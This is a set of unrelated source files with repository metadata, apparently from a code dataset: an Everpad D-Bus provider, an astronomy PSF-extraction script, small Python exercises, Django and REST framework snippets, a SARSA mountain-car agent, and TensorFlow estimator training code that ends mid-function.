ab6271a5b73eedf81d0c31e351e567282dbd6685
|
refs/heads/master
| 2020-12-25T05:55:05.811394 | 2012-12-19T03:36:25 | 2012-12-19T03:36:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,175 |
py
|
import sys
sys.path.insert(0, '../..')
from everpad.provider.service import ProviderService
from everpad.provider.sync import SyncThread
from everpad.provider.tools import set_auth_token, get_db_session
from everpad.tools import get_auth_token, print_version
from everpad.provider import models
from PySide.QtCore import Slot, QSettings
import dbus
import dbus.mainloop.glib
import signal
import fcntl
import os
import getpass
import argparse
if 'kde' in os.environ.get('DESKTOP_SESSION'): # kde init qwidget for wallet access
from PySide.QtGui import QApplication
App = QApplication
else:
from PySide.QtCore import QCoreApplication
App = QCoreApplication
class ProviderApp(App):
def __init__(self, verbose, *args, **kwargs):
App.__init__(self, *args, **kwargs)
self.settings = QSettings('everpad', 'everpad-provider')
self.verbose = verbose
session_bus = dbus.SessionBus()
self.bus = dbus.service.BusName("com.everpad.Provider", session_bus)
self.service = ProviderService(self, session_bus, '/EverpadProvider')
self.sync_thread = SyncThread(self)
self.sync_thread.sync_state_changed.connect(
Slot(int)(self.service.sync_state_changed),
)
self.sync_thread.data_changed.connect(
Slot()(self.service.data_changed),
)
if get_auth_token():
self.sync_thread.start()
self.service.qobject.authenticate_signal.connect(
self.on_authenticated,
)
self.service.qobject.remove_authenticate_signal.connect(
self.on_remove_authenticated,
)
@Slot(str)
def on_authenticated(self, token):
set_auth_token(token)
self.sync_thread.start()
@Slot()
def on_remove_authenticated(self):
self.sync_thread.quit()
set_auth_token('')
session = get_db_session()
session.query(models.Note).delete(
synchronize_session='fetch',
)
session.query(models.Resource).delete(
synchronize_session='fetch',
)
session.query(models.Notebook).delete(
synchronize_session='fetch',
)
session.query(models.Tag).delete(
synchronize_session='fetch',
)
session.commit()
def log(self, data):
if self.verbose:
print data
def main():
signal.signal(signal.SIGINT, signal.SIG_DFL)
fp = open('/tmp/everpad-provider-%s.lock' % getpass.getuser(), 'w')
fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
try:
os.mkdir(os.path.expanduser('~/.everpad/'))
os.mkdir(os.path.expanduser('~/.everpad/data/'))
except OSError:
pass
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', action='store_true', help='verbose output')
parser.add_argument('--version', '-v', action='store_true', help='show version')
args = parser.parse_args(sys.argv[1:])
if args.version:
print_version()
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
app = ProviderApp(args.verbose, sys.argv)
app.exec_()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
13f9fc971c3c8582a7f8e5715f7b253fbbd05b76
|
17ca5bae91148b5e155e18e6d758f77ab402046d
|
/analysis_ACS/CID3570/first_analysis/cut_PSFs_in_analysis.py
|
618268eb935438571ce91984e37bd80070f991f4
|
[] |
no_license
|
dartoon/QSO_decomposition
|
5b645c298825091c072778addfaab5d3fb0b5916
|
a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15
|
refs/heads/master
| 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,011 |
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 31 13:54:02 2018
@author: Dartoon
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
import sys
sys.path.insert(0,'../../py_tools')
from cut_image import cut_image, cut_center_bright, save_loc_png, grab_pos
import copy
import astropy.io.fits as pyfits
import os
path = os.getcwd()
ID = path.split('/')[-1]
fitsFile = pyfits.open('../../Cycle25data/ACS_data/{0}_acs_I_mosaic_180mas_sci.fits'.format(ID))
img = fitsFile[0].data # check the back grounp
#from astropy.visualization import SqrtStretch
#from astropy.stats import SigmaClip
#from photutils import Background2D, SExtractorBackground
#from astropy.visualization.mpl_normalize import ImageNormalize
#norm = ImageNormalize(stretch=SqrtStretch())
#sigma_clip = SigmaClip(sigma=3., iters=10)
#bkg_estimator = SExtractorBackground()
#from photutils import make_source_mask
#mask_0 = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
#mask_1 = (np.isnan(img))
#mask = mask_0 + mask_1
#bkg = Background2D(img, (50, 50), filter_size=(3, 3),
# sigma_clip=sigma_clip, bkg_estimator=bkg_estimator,
# mask=mask)
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(img, norm=LogNorm(), origin='lower')
##bkg.plot_meshes(outlines=True, color='#1f77b4')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(mask, origin='lower')
##bkg.plot_meshes(outlines=True, color='#1f77b4')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#
#back = bkg.background* ~mask_1
#fig=plt.figure(figsize=(15,15))
#ax=fig.add_subplot(1,1,1)
#ax.imshow(back, origin='lower', cmap='Greys_r')
#ax.xaxis.set_visible(False)
#ax.yaxis.set_visible(False)
#plt.show()
#
#img -= back
#pyfits.PrimaryHDU(img).writeto('sub_coadd.fits',overwrite=True)
#img = pyfits.getdata('sub_coadd.fits')
filename= '{0}.reg'.format(ID)
c_psf_list, QSO_loc = grab_pos(filename,reg_ty = 'acs', QSO_reg_return=True)
center_QSO = c_psf_list[QSO_loc]
QSO, cut_center = cut_center_bright(image=img, center=center_QSO, radius=60, return_center=True, plot=False)
QSO_outer = cut_image(image=img, center=cut_center, radius=200)
pyfits.PrimaryHDU(QSO).writeto('{0}_cutout.fits'.format(ID),overwrite=True)
pyfits.PrimaryHDU(QSO_outer).writeto('{0}_cutout_outer.fits'.format(ID),overwrite=True)
PSFs = []
PSF_gauss_centers = []
PSF_bright_centers = []
count=0
#psf_list = None
psf_list = np.delete(c_psf_list, (QSO_loc), axis=0)
dist = (psf_list-center_QSO)[:,0]**2+(psf_list-center_QSO)[:,1]**2
psf_list = psf_list[dist.argsort()]
for i in range(len(psf_list)):
print 'PSF',i
PSF, PSF_center = cut_center_bright(image=img, center=psf_list[i], radius=60, return_center=True, plot=False)
PSFs.append([PSF, 1, PSF_center])
PSF_gauss_centers.append(PSF_center)
_, PSF_br_center = cut_center_bright(image=img, center=psf_list[i], radius=60, kernel = 'center_bright', return_center=True, plot=False)
PSF_bright_centers.append(PSF_br_center)
count += 1
#extra_psfs = None
extra_psfs = np.array([[1479.9762,3554.7075], [5409.6929,4718.4676], [2870.2585,4735.0797], [1065.9795,1476.4033]])
dist_extra = (extra_psfs-center_QSO)[:,0]**2+(extra_psfs-center_QSO)[:,1]**2
extra_psfs = extra_psfs[dist_extra.argsort()]
for i in range(len(extra_psfs)):
print 'PSF',count
PSF, PSF_center = cut_center_bright(image=img, center=extra_psfs[i], radius=60, return_center=True, plot=False)
PSFs.append([PSF,0, PSF_center])
PSF_gauss_centers.append(PSF_center)
_, PSF_br_center = cut_center_bright(image=img, center=extra_psfs[i], radius=60, kernel = 'center_bright', return_center=True, plot=False)
PSF_bright_centers.append(PSF_br_center)
count += 1
from mask_objects import mask_obj
print "QSO:"
a, QSO_mask = mask_obj(img=QSO, exp_sz=1.4)
if len(QSO_mask) > 1:
QSO_mask = np.sum(np.asarray(QSO_mask),axis=0)
elif len(QSO_mask) == 1:
QSO_mask = QSO_mask[0]
#print "QSO image:"
#plt.imshow((QSO_mask), origin='lower')
#plt.show()
QSO_mask = (1 - (QSO_mask != 0)*1.)
PSF_msk_list = []
for i in range(len(PSFs)):
print "PSF{0}:".format(i)
_, PSF_mask = mask_obj(img=PSFs[i][0], snr=3., exp_sz=2.4)
if len(PSF_mask) > 1:
PSF_mask = np.sum(np.asarray(PSF_mask),axis=0)
elif len(PSF_mask) == 1:
PSF_mask = PSF_mask[0]
# print "PSF{0} image:".format(i)
# plt.imshow(PSF_mask, origin='lower')
# plt.show()
PSF_mask = (1 - (PSF_mask != 0)*1.)
if i in PSF_msk_list:
PSF_mask = PSF_mask*0 + 1
print "PSF", i, "not use this mask"
PSFs[i].append(PSF_mask)
center_match = (np.sum(abs(np.asarray(PSF_gauss_centers)-np.asarray(PSF_bright_centers)),axis = 1) == 0)
PSFs_all = copy.deepcopy(PSFs)
PSFs=[]
for i in range(len(PSFs_all)):
if center_match[i] == True:
print i
PSFs.append(PSFs_all[i])
#==============================================================================
# Compare the FWHM
#==============================================================================
from measure_FWHM import measure_FWHM
FWHM = []
for i in range(len(PSFs)):
FWHM_i = measure_FWHM(PSFs[i][0])[0]
print "The measued FWHM for PSF", i, ":", FWHM_i
FWHM.append(FWHM_i)
FWHM = np.asarray(FWHM)
#==============================================================================
# Compare the profile and derive the Average image
#==============================================================================
flux_list = []
for i in range(len(PSFs)):
flux = np.sum(PSFs[i][0]*PSFs[i][3])
print "tot_flux for PSF{0}".format(i), flux
flux_list.append(flux)
del_list = [0,3]
PSFs = [PSFs[i] for i in range(len(PSFs)) if i not in del_list]
#plot the first selection
if extra_psfs is None:
save_loc_png(img,center_QSO,psf_list, ID=ID, label='ini' ,reg_ty = 'acs')
else:
save_loc_png(img,center_QSO,psf_list,extra_psfs, ID=ID, label='ini', reg_ty = 'acs')
PSFs_familiy = [PSFs[i][1] for i in range(len(PSFs))]
if extra_psfs is None:
loc_PSFs = psf_list
elif psf_list is None:
loc_PSFs = extra_psfs
else:
loc_PSFs = np.append(psf_list, extra_psfs, axis=0)
loc_ind_star = [PSFs[i][2] for i in range(len(PSFs)) if PSFs[i][1]==1] #and flux_list[i]>100]
loc_like_star = [PSFs[i][2] for i in range(len(PSFs)) if PSFs[i][1]==0] # and flux_list[i]>100]
if PSFs_familiy[-1] ==1:
save_loc_png(img,center_QSO,loc_ind_star, ID=ID,reg_ty = 'acs')
else:
save_loc_png(img,center_QSO,loc_ind_star,loc_like_star, ID=ID,reg_ty = 'acs')
PSF_list = [PSFs[i][0] for i in range(len(PSFs))]
PSF_masks = [PSFs[i][3] for i in range(len(PSFs))]
from flux_profile import QSO_psfs_compare
gridsp_l = ['log', None]
if_annuli_l = [False, True]
for i in range(2):
for j in range(2):
plt_which_PSF = None
plt_QSO = False
# if i+j == 0:
# plt_which_PSF = range(len(PSFs))
# plt_QSO = True
fig_psf_com = QSO_psfs_compare(QSO=QSO, QSO_msk=QSO_mask, psfs= PSF_list,
plt_which_PSF=plt_which_PSF,
PSF_mask_img=PSF_masks, grids=30,
include_QSO=True,
plt_QSO = plt_QSO, norm_pix = 5.0,
gridspace= gridsp_l[i], if_annuli=if_annuli_l[j])
# fig_psf_com.savefig('PSFvsQSO{0}_{1}_{2}.pdf'.format(i,['xlog','xlin'][i],['circ','annu'][j]))
if j==1:
plt.show()
else:
plt.close()
import pickle
filename='{0}_PSFs_QSO'.format(ID)
datafile = open(filename, 'wb')
QSOs = [QSO,cut_center]
pickle.dump([PSFs, QSOs], open(filename, 'wb'))
datafile.close()
#import pickle
#datafile = open('{0}_PSFs_QSO'.format(ID),'rb')
#PSFs, QSO=pickle.load(open('XID2202_PSFs_QSO','rb'))
#datafile.close()
|
[
"[email protected]"
] | |
08de3983cade375a46349f7de656f9ca3a921a9e
|
89b45e528f3d495f1dd6f5bcdd1a38ff96870e25
|
/PythonCrashCourse/chapter_06/exercise6_05.py
|
b03a04f3a086ec1337414ecd27d147eb1ba55d24
|
[] |
no_license
|
imatyukin/python
|
2ec6e712d4d988335fc815c7f8da049968cc1161
|
58e72e43c835fa96fb2e8e800fe1a370c7328a39
|
refs/heads/master
| 2023-07-21T13:00:31.433336 | 2022-08-24T13:34:32 | 2022-08-24T13:34:32 | 98,356,174 | 2 | 0 | null | 2023-07-16T02:31:48 | 2017-07-25T22:45:29 |
Python
|
UTF-8
|
Python
| false | false | 660 |
py
|
#!/usr/bin/env python3
rivers = {
'amazon': 'brasil',
'nile': 'egypt',
'mississippi': 'usa',
}
for river, country in rivers.items():
if river == 'mississippi':
print("The " + river.title() + " runs through " + country.upper() + ".")
else:
print("The " + river.title() + " runs through " + country.title() + ".")
print("\nThe following rivers have been mentioned:")
for river in set(rivers.keys()):
print(river.title())
print("\nThe following countries have been mentioned:")
for country in set(rivers.values()):
if country == 'usa':
print(country.upper())
else:
print(country.title())
|
[
"[email protected]"
] | |
68a5556339d6c4ba6f854be0cda3f296574eaf67
|
5981fc46a2e033b1c8b3f49449ee55c3dbcc17c6
|
/allopathy/views.py
|
ec56988bb3024a45ff6d4c154ecd36f652af9285
|
[] |
no_license
|
shamitlal/Medical-Website
|
619ad0aa18dc69fe13cb5850d4de6a177d41d6ca
|
17d3f1387c65f5bda547894d002ef22143484158
|
refs/heads/master
| 2021-01-13T14:50:44.216726 | 2016-12-14T19:03:25 | 2016-12-14T19:03:25 | 76,488,492 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 148 |
py
|
from django.shortcuts import render
# Create your views here.
def allopathy(request):
return render(request, 'allopathy/allopathy.html', {})
|
[
"[email protected]"
] | |
806594d6287d004b7f59fd97bde8ccda5942dc4a
|
17d531819123ea09fef201353efcbee4e8ff8097
|
/reduce/owner/permissions.py
|
7566e4734a5b33e2760e0341428f1d01cee25dce
|
[] |
no_license
|
showmethepeach/Re.duce
|
07a00463c02c572d6e96e177ea0ef5e6e615c2ad
|
d1ca88ef2256683e0ef51f12c0b6ec747fdda24c
|
refs/heads/master
| 2021-08-24T01:10:51.920406 | 2017-10-26T15:53:22 | 2017-10-26T15:53:22 | 104,641,211 | 0 | 0 | null | 2017-11-16T06:15:53 | 2017-09-24T12:11:28 |
Python
|
UTF-8
|
Python
| false | false | 290 |
py
|
from rest_framework import permissions
class IsOwner(permissions.BasePermission):
"""
OWNER에게만 쓰기, 읽기 허용
"""
def has_permission(self, request, view):
if request.user.is_authenticated and request.user.owner is not None:
return True
|
[
"[email protected]"
] | |
b99ab818fca8289648830abc2a851b6e7323a5e5
|
2e60017779c5c286629ab5a3a7aeb27a6b19a60b
|
/python/2017day19part2.py
|
7f09c5b24ce6b8bf021a566185e157549778341b
|
[] |
no_license
|
jamesjiang52/10000-Lines-of-Code
|
f8c7cb4b8d5e441693f3e0f6919731ce4680f60d
|
3b6c20b288bad1de5390ad672c73272d98e93ae0
|
refs/heads/master
| 2020-03-15T03:50:38.104917 | 2018-05-07T04:41:52 | 2018-05-07T04:41:52 | 131,952,232 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,680 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 19 13:21:23 2017
@author: James Jiang
"""
all_lines = [line.rstrip('\n') for line in open('Data.txt')]
all_lines_chars = []
for i in range(len(all_lines)):
chars = [j for j in all_lines[i]]
all_lines_chars.append(chars)
index_list = 0
index_all = 0
for i in range(len(all_lines_chars[0])):
if all_lines_chars[0][i] == '|':
index_list = i
mode = 'down'
total = 0
while True:
if all_lines_chars[index_all][index_list] == ' ':
break
if all_lines_chars[index_all][index_list] == '+':
k = 0
if (mode == 'down') or (mode == 'up'):
if index_list != 0:
if all_lines_chars[index_all][index_list - 1] != ' ':
mode = 'left'
k += 1
if index_list != len(all_lines_chars[index_all]) - 1:
if all_lines_chars[index_all][index_list + 1] != ' ':
mode = 'right'
k += 1
elif (mode == 'left') or (mode == 'right'):
if index_all != 0:
if all_lines_chars[index_all - 1][index_list] != ' ':
mode = 'up'
k += 1
if index_all != len(all_lines_chars) - 1:
if all_lines_chars[index_all + 1][index_list] != ' ':
mode = 'down'
k += 1
if k == 0:
break
if mode == 'down':
index_all += 1
elif mode == 'up':
index_all -= 1
elif mode == 'left':
index_list -= 1
elif mode == 'right':
index_list += 1
total += 1
print(total)
|
[
"[email protected]"
] | |
a1912ffe7b983cce6c3ec5119d89a01a0a747635
|
fd02e8924ba325f2a62bbf97e460740a65559c74
|
/PythonStart/0722Python/循环.py
|
6e97b5c0cfd955e8823bf5ef1a968b1dc63d9ef4
|
[] |
no_license
|
ShiJingChao/Python-
|
51ee62f7f39e0d570bdd853794c028020ca2dbc2
|
26bc75c1981a1ffe1b554068c3d78455392cc7b2
|
refs/heads/master
| 2020-07-08T00:05:16.532383 | 2019-10-14T15:19:49 | 2019-10-14T15:19:49 | 203,512,684 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 199 |
py
|
# for i in range(1, 1001):
# print("第%d" % i, "次hello word", end=',')
# i=1
# while i < 100:
# print(i, end=" ")
# i += 1
a = 1100
b = 2255
print(a & b)
c = 0b100011001111
print(a&c)
|
[
"[email protected]"
] | |
c7e32b7956006589585393f647556ed9c81dfb10
|
7f25740b1ef47edc24db1a3618b399959b073fe1
|
/1105_08_closer.py
|
60b915e8ee1fc7296456e8dbffab48f45dbbce39
|
[] |
no_license
|
pjh9362/PyProject
|
b2d0aa5f8cfbf2abbd16232f2b55859be50446dc
|
076d31e0055999c1f60767a9d60e122fb1fc913e
|
refs/heads/main
| 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 335 |
py
|
'''
x = 10 #전역 변수
def foo():
print(x) #전역 변수 출력
foo()
print(x) #전역 변수 출력
'''
def foo():
x = 10 # foo의 지역 변수
print(x) # foo의 지역 변수 출력
foo()
print(x) # 에러. foo의 지역 변수는 출력할 수 없음
|
[
"[email protected]"
] | |
96d43d8fa24fe2bf0141da26ab1de903a5a6164a
|
6d3c865ce6d9c416d8d11e91d6571a5154b036cf
|
/js_vacancies/apps.py
|
c28e61b96619b705fa4509492f9bf1a51fea5e6d
|
[] |
no_license
|
compoundpartners/js-vacancies
|
2cc94c842df980be177c6fa64b3879b5dcc50bbc
|
175d9f3673c7b002db5c0ea550bb0f29638b7cbb
|
refs/heads/master
| 2021-07-17T05:41:29.800636 | 2020-07-07T14:25:28 | 2020-07-07T14:25:28 | 178,962,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 152 |
py
|
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class Vacancies(AppConfig):
name = 'js_vacancies'
verbose_name = 'Vacancies'
|
[
"[email protected]"
] | |
4f596c420101e3d0cb7db56aec280d763311ef13
|
6f04a6ef99c581ed2f0519c897f254a7b63fb61d
|
/rastervision/data/vector_source/default.py
|
3946d67b4fa693f28e9a6590c44f1eadb29e48b8
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
dgketchum/raster-vision
|
18030c9a8bfe99386aa95adbf8e3ec51d204947f
|
fe74bef30daa5821023946576b00c584ddc56de8
|
refs/heads/master
| 2020-08-30T13:56:08.598240 | 2019-11-03T17:38:33 | 2019-11-03T17:38:33 | 218,400,435 | 3 | 1 |
NOASSERTION
| 2019-10-29T23:09:57 | 2019-10-29T23:09:57 | null |
UTF-8
|
Python
| false | false | 1,230 |
py
|
from abc import (ABC, abstractmethod)
import os
import rastervision as rv
class VectorSourceDefaultProvider(ABC):
@staticmethod
@abstractmethod
def handles(s):
"""Returns True of this provider is a default for this string"""
pass
@abstractmethod
def construct(s):
"""Constructs a default VectorSource based on the
string.
"""
pass
class GeoJSONVectorSourceDefaultProvider(VectorSourceDefaultProvider):
@staticmethod
def handles(uri):
ext = os.path.splitext(uri)[1]
return ext.lower() in ['.json', '.geojson']
@staticmethod
def construct(uri):
return rv.VectorSourceConfig.builder(rv.GEOJSON_SOURCE) \
.with_uri(uri) \
.build()
class VectorTileVectorSourceDefaultProvider(VectorSourceDefaultProvider):
@staticmethod
def handles(uri):
ext = os.path.splitext(uri)[1]
return ext.lower() in ['.pbf', '.mvt']
@staticmethod
def construct(uri):
return rv.VectorSourceConfig.builder(rv.VECTOR_TILE_SOURCE) \
.with_uri(uri) \
.build()
|
[
"[email protected]"
] | |
e33911f4ff39e954282be6c971e468995f91606c
|
0d32e3819606c3fb6820d0cd5f5097db3b0d3dd4
|
/HW3/sarsa_mountain_car.py
|
0d4789ce9c45fd1092146fe290050525440869d0
|
[] |
no_license
|
IanCBrown/COMP5600
|
e8e06b2a8e3bde0acc6897adb2396a57a2811f0a
|
ef454c009d6fd5eec50ceec5a8283a7c6d81d097
|
refs/heads/master
| 2020-08-02T13:20:41.024681 | 2019-12-09T03:53:37 | 2019-12-09T03:53:37 | 211,366,293 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,189 |
py
|
import math
import numpy as np
import matplotlib
matplotlib.use("TkAgg")
from matplotlib import pyplot as plt
import gym
from gym import spaces
from gym.utils import seeding
# Resources:
# https://en.wikipedia.org/wiki/Mountain_car_problem
# https://towardsdatascience.com/getting-started-with-reinforcement-learning-and-open-ai-gym-c289aca874f
# https://towardsdatascience.com/reinforcement-learning-temporal-difference-sarsa-q-learning-expected-sarsa-on-python-9fecfda7467e
def epsilon_greedy(Q, state, action_space, epsilon):
# if in epsilon range use it
if np.random.rand() < 1 - epsilon:
action = np.argmax(Q[state[0], state[1]])
# else take random action
else:
action = np.random.randint(0, action_space)
return action
def sarsa(learning_rate, discount, epsilon, min_epsilon, episodes):
# initialize environment
env = gym.make("MountainCar-v0")
env.reset()
states = (env.observation_space.high - env.observation_space.low)*np.array([10,100])
states = np.round(states, 0).astype(int) + 1
# Q(s,a)
Q_table = np.random.uniform(low = -1, high = 1, size = (states[0], states[1], env.action_space.n))
reward_list = []
var_list = []
avg_reward_list = []
# reduce epsilon linearly as time increases
decay = (epsilon - min_epsilon)/episodes
# Q learning main loop
for i in range(episodes):
finished = False
total_reward = 0
reward = 0
state = env.reset()
state_adj = (state - env.observation_space.low)*np.array([10,100])
state_adj = np.round(state_adj, 0).astype(int)
while not finished:
# render last N episodes
# comment out to see plots
# if i >= episodes - 1:
# env.render()
# pick aciton greedily without randomness
action = epsilon_greedy(Q_table, state_adj, env.action_space.n, epsilon)
next_state, reward, finished, info = env.step(action)
# Discretize
next_state_adj = (next_state - env.observation_space.low)*np.array([10,100])
next_state_adj = np.round(next_state_adj, 0).astype(int)
if finished and next_state[0] >= 0.5: # and ... condition
Q_table[state_adj[0], state_adj[1], action] = reward
else:
update = learning_rate * (reward + discount * np.max(Q_table[next_state_adj[0],next_state_adj[1]])
- Q_table[state_adj[0], state_adj[1], action])
# update Q table
Q_table[state_adj[0], state_adj[1], action] += update
total_reward += reward
state_adj = next_state_adj
# decay epsilon if still greater than min_epsilon
if epsilon > min_epsilon:
epsilon -= decay
reward_list.append(total_reward)
# choose how often to record data
# recording every data point will make the plots crowded
# 10 and 100 work well.
recording_interval = 100
if i % recording_interval == 0:
avg_reward = np.mean(reward_list)
var = np.var(reward_list)
var_list.append(var)
avg_reward_list.append(avg_reward)
reward_list = []
env.close()
return (avg_reward_list, var_list)
# Adjust these parameters as needed
number_of_episodes = 2500
learning_rate = 0.1
gamma = 0.9
epsilon = 0.8
min_epsilon = 0
def single_run():
"""
Run the algorithm once
"""
rewards_and_var = sarsa(learning_rate, gamma, epsilon, min_epsilon, number_of_episodes)
avg_reward = rewards_and_var[0]
var = rewards_and_var[1]
episodes1 = 100*(np.arange(len(avg_reward)) + 1)
episodes2 = 100*(np.arange(len(var)) + 1)
plt.figure("Average Reward vs. Episodes")
plt.title("Average Reward vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Average Reward")
plt.plot(episodes1, avg_reward, color='blue')
plt.figure("Variance vs. Episodes")
plt.title("Variance vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Variance")
plt.plot(episodes2, var, color='orange')
plt.figure("Average Reward w/ Variance vs. Episodes")
plt.title("Average Reward w/ Variance vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Average Reward w/ Variance")
plt.errorbar(episodes1, avg_reward, var, linestyle='None', marker='^', ecolor="orange")
plt.show()
def multi_run(N):
"""
Run the algorithm N times
@param N - number of times to test (e.g. 20)
"""
rewards = []
vars = []
for _ in range(N):
rewards_and_var = sarsa(learning_rate, gamma, epsilon, min_epsilon, number_of_episodes)
avg_reward = rewards_and_var[0]
var = rewards_and_var[1]
rewards.append(avg_reward)
vars.append(var)
rewards = list(zip(*rewards))
vars = list(zip(*vars))
reward_to_plot = []
for sublist in rewards:
reward_to_plot.append(np.mean(sublist))
var_to_plot = []
for sublist in vars:
var_to_plot.append(np.mean(sublist))
episodes1 = 100*(np.arange(len(avg_reward)) + 1)
episodes2 = 100*(np.arange(len(var)) + 1)
plt.figure("Average Reward vs. Episodes")
plt.title("Average Reward vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Average Reward")
plt.plot(episodes1, reward_to_plot, color='blue')
plt.savefig("sarsa_results/Average_Reward_vs_Episodes.png")
plt.figure("Variance vs. Episodes")
plt.title("Variance vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Variance")
plt.plot(episodes2, var_to_plot, color='orange')
plt.savefig("sarsa_results/Variance_vs_Episodes.png")
plt.figure("Average Reward w/ Variance vs. Episodes")
plt.title("Average Reward w/ Variance vs. Episodes")
plt.xlabel("Episodes")
plt.ylabel("Average Reward w/ Variance")
plt.errorbar(episodes1, reward_to_plot, var_to_plot, linestyle='None', marker='^', ecolor="orange")
plt.savefig("sarsa_results/Average_Reward_and_Variance_vs_Episodes.png")
# choose multi or single run
# single_run()
multi_run(20)
|
[
"[email protected]"
] | |
e45a01330d9e90fa76dea147d9fc060e42d10c77
|
9044b440bed2b8407ed9e04f7fb9d3d2a7593136
|
/vision/classification/slim/image_models/finetune/train.py
|
b15420b6bf71de14a447e1b40980949e6c95830b
|
[] |
no_license
|
xuzhezhaozhao/ai
|
d4264f5d15cc5fa514e81adb06eb83731a0ca818
|
925cbd31ad79f8827e2c3c706f4b51910f9f85d1
|
refs/heads/master
| 2022-01-22T07:04:29.082590 | 2022-01-17T06:49:39 | 2022-01-17T06:49:39 | 136,691,051 | 5 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,638 |
py
|
#! /usr/bin/env python
# -*- coding=utf8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import input_data
import hook
import build_model_fn
def build_estimator(opts):
"""Build estimator."""
num_samples_per_epoch = len(input_data.read_txt_file(
opts.train_data_path, False))
save_checkpoints_secs = None
if opts.save_checkpoints_secs > 0:
save_checkpoints_secs = opts.save_checkpoints_secs
save_checkpoints_steps = None
if opts.save_checkpoints_steps > 0 and opts.save_checkpoints_epoches > 0:
raise ValueError("save_checkpoints_steps and save_checkpoints_epoches "
"should not be both set.")
if opts.save_checkpoints_steps > 0:
save_checkpoints_steps = opts.save_checkpoints_steps
if opts.save_checkpoints_epoches > 0:
save_checkpoints_steps = int(opts.save_checkpoints_epoches *
num_samples_per_epoch / opts.batch_size)
config_keys = {}
config_keys['model_dir'] = opts.model_dir
config_keys['tf_random_seed'] = None
config_keys['save_summary_steps'] = opts.save_summary_steps
config_keys['save_checkpoints_secs'] = save_checkpoints_secs
config_keys['save_checkpoints_steps'] = save_checkpoints_steps
config_keys['session_config'] = None
config_keys['keep_checkpoint_max'] = opts.keep_checkpoint_max
config_keys['keep_checkpoint_every_n_hours'] = 10000
config_keys['log_step_count_steps'] = opts.log_step_count_steps
estimator_keys = {}
estimator_keys['model_fn'] = build_model_fn.model_fn
estimator_keys['params'] = {
'opts': opts,
'num_samples_per_epoch': num_samples_per_epoch
}
config = tf.estimator.RunConfig(**config_keys)
estimator_keys['config'] = config
estimator = tf.estimator.Estimator(**estimator_keys)
return estimator
def create_hooks(opts):
"""Create profile hooks."""
save_steps = opts.profile_steps
meta_hook = hook.MetadataHook(save_steps=save_steps,
output_dir=opts.model_dir)
profile_hook = tf.train.ProfilerHook(save_steps=save_steps,
output_dir=opts.model_dir,
show_dataflow=True,
show_memory=True)
hooks = [meta_hook, profile_hook] if opts.use_profile_hook else []
return hooks
def train_and_eval_in_local_mode(opts, estimator, hooks):
"""Train and eval model in lcoal mode."""
build_train_input_fn = input_data.build_train_input_fn(
opts, opts.train_data_path)
build_eval_input_fn = input_data.build_eval_input_fn(
opts, opts.eval_data_path)
num_samples_per_epoch = len(
input_data.read_txt_file(opts.train_data_path, False))
num_steps_per_epoch = num_samples_per_epoch / opts.batch_size
if opts.max_train_steps > 0:
max_steps = opts.max_train_steps
else:
max_steps = opts.epoch*num_steps_per_epoch
tf.logging.info('max_steps = {}'.format(max_steps))
max_steps_without_decrease = int(
opts.max_epoches_without_decrease*num_steps_per_epoch)
early_stopping_min_steps = int(
opts.early_stopping_min_epoches*num_steps_per_epoch)
run_every_steps = int(
opts.early_stopping_run_every_epoches*num_steps_per_epoch)
early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
estimator, "loss",
max_steps_without_decrease=max_steps_without_decrease,
run_every_secs=None,
min_steps=early_stopping_min_steps,
run_every_steps=run_every_steps)
hooks.append(early_stopping_hook)
train_spec = tf.estimator.TrainSpec(
input_fn=build_train_input_fn,
max_steps=max_steps,
hooks=hooks)
eval_spec = tf.estimator.EvalSpec(
input_fn=build_eval_input_fn,
steps=None,
name='eval',
start_delay_secs=3,
throttle_secs=opts.throttle_secs)
result = tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
return result
def export_model_in_local_mode(opts, estimator):
"""Export model in local mode."""
# export model
tf.logging.info("Beginning export model ...")
estimator.export_savedmodel(
opts.export_model_dir,
serving_input_receiver_fn=input_data.build_serving_input_fn(opts))
tf.logging.info("Export model OK")
def train(opts, export=False):
"""Train model."""
estimator = build_estimator(opts)
hooks = create_hooks(opts)
result = train_and_eval_in_local_mode(opts, estimator, hooks)
if export:
export_model_in_local_mode(opts, estimator)
return result
def predict(opts):
tf.logging.info("Begin predict ...")
estimator = build_estimator(opts)
